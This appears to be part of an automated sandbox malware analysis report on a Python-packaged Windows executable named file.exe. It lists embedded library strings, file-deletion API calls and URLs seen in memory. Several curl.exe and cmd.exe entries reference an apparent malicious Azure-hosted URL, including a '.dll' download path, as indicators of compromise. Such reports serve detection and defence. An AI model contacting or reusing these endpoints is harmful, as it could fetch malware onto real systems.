Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: file.exe, 00000000.00000003.1754551936.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: file.exe, 00000000.00000003.1751564708.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: file.exe, 00000000.00000003.1752254686.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: file.exe, 00000000.00000003.1751690780.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: file.exe, 00000000.00000003.1750170866.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1749386479.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: file.exe, 00000000.00000003.1753999667.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: file.exe, 00000000.00000003.1750613362.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1754551936.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1750979635.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: file.exe, 00000000.00000003.1750492184.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1751802736.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1754116826.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1751564708.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: file.exe, 00000000.00000003.1751343265.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1s 1 Nov 2022built on: Mon Jan 9 20:35:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.0.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: file.exe, 00000000.00000003.1753659236.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1752494159.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: file.exe, 00000000.00000003.1754336115.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399B85A0 FindFirstFileExW,FindClose,	0_2_00007FF6399B85A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399B79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF6399B79B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399D0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6399D0B84
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399B85A0 FindFirstFileExW,FindClose,	1_2_00007FF6399B85A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399B79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF6399B79B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399D0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF6399D0B84
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF1CD4E0 FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,	1_2_00007FFDFF1CD4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF1CD274 FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,	1_2_00007FFDFF1CD274

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00007FFE14635B24 memset,recvfrom,

1_2_00007FFE14635B24

Source: file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D2C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757299329.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749386479.0000019DE7D2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748538960.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3015368377.0000019DE7D2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757299329.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749386479.0000019DE7D2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748538960.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757299329.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748538960.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D2C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757299329.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748538960.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3015368377.0000019DE7D2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D2C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757299329.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749386479.0000019DE7D2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748538960.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3015368377.0000019DE7D2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757299329.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749386479.0000019DE7D2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748538960.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757299329.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748538960.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: unicodedata.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757299329.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749386479.0000019DE7D2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748538960.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757299329.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749386479.0000019DE7D2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748538960.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D2C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757299329.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748538960.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3015368377.0000019DE7D2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D2C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757299329.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749386479.0000019DE7D2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748538960.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3015368377.0000019DE7D2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757299329.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748538960.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: cmd.exe, 00000014.00000002.2301125522.0000011D339BB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2614401574.000001F6D755B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000024.00000002.2826345044.0000025479CAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazils
Source: cmd.exe, 0000000B.00000002.1987434751.00000151D2B3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazils)
Source: cmd.exe, 00000017.00000002.2406037996.000002495FCDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsMUa
Source: cmd.exe, 0000000E.00000002.2093847695.0000023B32ECA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsa;V%t
Source: curl.exe, 00000004.00000002.1778152644.0000016B7F679000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsotth.clo
Source: curl.exe, 00000004.00000002.1778152644.0000016B7F679000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsotth.cloJh
Source: curl.exe, 0000000D.00000003.1986647972.000002C391116000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1986571053.000002C391113000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.2091064539.0000023561B53000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.2091103305.0000023561B56000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000026.00000002.2825899074.000002913BBA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.clo
Source: curl.exe, 00000029.00000002.2934470574.0000019D78D70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000002.2934470574.0000019D78D79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180
Source: curl.exe, 00000016.00000002.2300773885.0000021670880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180$i
Source: curl.exe, 0000001D.00000002.2509049134.0000020D856D8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000026.00000002.2825899074.000002913BBA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180&
Source: curl.exe, 00000004.00000002.1778152644.0000016B7F670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180)
Source: curl.exe, 0000000D.00000003.1986647972.000002C391116000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1986571053.000002C391113000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180-=o
Source: curl.exe, 00000004.00000002.1778152644.0000016B7F679000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.1882730514.000001DC607C9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.2091064539.0000023561B53000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.2091103305.0000023561B56000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000002.2614033596.00000268D07A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180.dll
Source: curl.exe, 0000000D.00000003.1986647972.000002C391116000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1986571053.000002C391113000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180.dllw=
Source: curl.exe, 00000004.00000002.1778152644.0000016B7F679000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180/e
Source: curl.exe, 00000007.00000002.1882730514.000001DC607C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=8351801
Source: curl.exe, 00000013.00000002.2196917776.0000027F4B1C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=8351802
Source: cmd.exe, 00000002.00000002.1778550741.000001E9C2AB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1883570103.00000227A2880000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1987567333.00000151D2EF0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2093960065.0000023B33100000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2197379199.000001862F590000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2301212790.0000011D33BD0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2406000528.000002495FC90000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.2509466072.000002173DD20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2614482891.000001F6D7860000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2722701350.000001AF23E10000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000024.00000002.2826434707.0000025479FF0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000027.00000002.2934998851.0000015E6BBD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=8351802OneDrive=C:
